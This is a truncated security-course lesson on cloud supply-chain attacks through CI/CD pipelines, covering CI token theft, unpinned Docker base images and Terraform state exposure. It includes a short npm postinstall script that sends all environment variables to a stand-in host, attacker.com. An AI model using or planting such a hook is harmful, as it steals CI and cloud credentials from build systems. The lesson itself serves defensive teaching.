Cloud deployments run what your CI/CD builds. If your pipeline is compromised, your cloud is compromised — with full IAM of deployment roles. This is the cloud supply chain problem, and it has driven some of the largest public breaches.

Why this happens

Modern deployment: code → GitHub → GitHub Actions → container build → registry → Kubernetes/ECS/Lambda → production. Each link is trust-based. Compromise any one and the downstream trust carries attacker payload into production.

Specifically for cloud:

CI system (GitHub Actions, CircleCI, GitLab CI) has deploy credentials for cloud
Container registries store build artifacts used by cloud workloads
IaC (Terraform, Pulumi, CloudFormation) applies with cloud admin roles
Helm charts, OCI artifacts, configuration repos — all pipeline-delivered

A single compromised step injects into everything downstream.

Specific attack patterns

CI token exfiltration

# Malicious dependency in build process exfiltrates CI secrets
# npm package with postinstall script reading env vars:
# package.json postinstall: "node exfil.js"
# exfil.js:
const http = require('https');
const env = JSON.stringify(process.env);
http.request({host:'attacker.com',path:'/x'},r=>{}).write(env).end();

# Environment on GitHub Actions runner contains:
# GITHUB_TOKEN, AWS_ACCESS_KEY_ID, etc.
# Attacker gets cloud creds → full access to whatever role has

Compromised Docker image

Base image at FROM ubuntu:20.04 gets updated. If you don’t pin by digest, you get whatever the latest is. Compromised upstream = compromised build. Pin to digest: FROM ubuntu@sha256:abc....

Terraform state hijack

Terraform state files contain secrets + config. State stored in S3 — attacker who reads state learns secrets + can MITM Terraform runs. State stored locally — lost on dev machine. State without encryption in remote backend — exposed.

🔐 Advanced Module · Pro Tier

Continue reading with Pro tier (₹4,999/year)

You've read 38% of this module. Unlock the remaining deep-dive, quiz, and every other Advanced/Expert module.

136+ modulesAll levels up to this tier

20-question quizzesUnlimited retries with explanations

Completion certificatesShareable on LinkedIn

See pricing → Sign in

2 more sections locked below

Module 7 · Cloud Supply Chain — CI to Production 🔒

Why this happens

Specific attack patterns

CI token exfiltration

Compromised Docker image

Terraform state hijack

Continue reading with Pro tier (₹4,999/year)

Other modules in this track

Module 10 · Multi-Cloud — The Complexity Tax <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>

Module 8 · Public Data Stores — The Classic <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>

Module 4 · Cross-Account Trust Attacks <span style="color:#6EC1E4;font-size:0.7em;vertical-align:middle;" title="Academy lesson — sign in for full access">🔒</span>